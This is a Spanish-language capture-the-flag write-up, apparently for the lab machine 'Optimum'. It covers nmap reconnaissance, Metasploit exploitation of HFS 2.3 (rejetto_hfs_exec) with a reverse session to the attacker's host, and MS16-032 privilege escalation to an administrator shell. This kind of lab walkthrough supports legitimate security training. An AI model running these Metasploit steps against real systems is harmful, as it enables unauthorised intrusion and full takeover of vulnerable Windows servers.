# Optimum

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.10.8
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FxyJjm9pWB7v0YFIuW7qO%2FCaptura%20de%20pantalla%202025-02-16%20183702.png?alt=media&#x26;token=c3b0bcf7-11ad-47ff-bcfe-45bd5aa90ce9" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.10.8
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FVTTciFwfV8iThBlOkK2I%2FCaptura%20de%20pantalla%202025-02-16%20184014.png?alt=media&#x26;token=e9f2ef51-bf95-4f68-b510-3001289b8e81" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **Puerto 80 (HTTP):** Este puerto generalmente está asociado a servidores web. Si el servicio está ejecutando un servidor web como Apache, Nginx o IIS, es recomendable buscar vulnerabilidades conocidas relacionadas con el software y versiones en uso (por ejemplo, a través de CVEs). Además, es importante realizar pruebas de seguridad en las aplicaciones web que se ejecutan en el servidor, como inyecciones SQL, Cross-Site Scripting (XSS) o vulnerabilidades de escalada de privilegios.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p80 -v 10.10.10.8
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1z3MKbTfXPkisWxMzzNt%2FCaptura%20de%20pantalla%202025-02-16%20185051.png?alt=media&#x26;token=f0869994-075e-4041-82a1-fb01eb4ae452" alt=""><figcaption></figcaption></figure>

Buscamos exploits sobre esa versión.

```bash
searchsploit HFS 2.3
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FxYe8ajQSOTnTyzpPgvX8%2Fimage.png?alt=media&#x26;token=6a9b529a-b54e-463e-a42c-3048b4932853" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Explotamos a través de Metasploit.

```bash
use windows/http/rejetto_hfs_exec
set RHOSTS 10.10.10.8
set LHOST 10.10.14.7
run
background
```

Estamos dentro del Usuario Kostas por lo que podemos conseguir la flag del user. Buscamos a través de Metasploit que exploit nos recomienda.

### 🔐 **PRIVILEGIOS**

```bash
use multi/recon/local_exploit_suggerster
```

Descubrimos uno que nos llama la atención para explotarlo.

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/local/ms16_032_secondary_logon_handle_privesc/>" %}

```bash
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set LHOST 10.10.14.7 
set session 1  
exploit
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FxBXlEgOPrSxYYSXWu8dU%2Fimage.png?alt=media&#x26;token=4c37d434-7566-497e-acc6-91458a2d04d0" alt=""><figcaption></figcaption></figure>

```bash
getuid
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FvahTuiceVU4B9g5NL1Ry%2Fimage.png?alt=media&#x26;token=73caf591-67e3-41ac-a42d-a3de27afd3ac" alt=""><figcaption></figcaption></figure>

Ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FcoHGN21YG3UesfkeLGcT%2Fimage.png?alt=media&#x26;token=aeea21bd-c5b7-452f-82f7-0dd232630073" alt=""><figcaption></figcaption></figure>
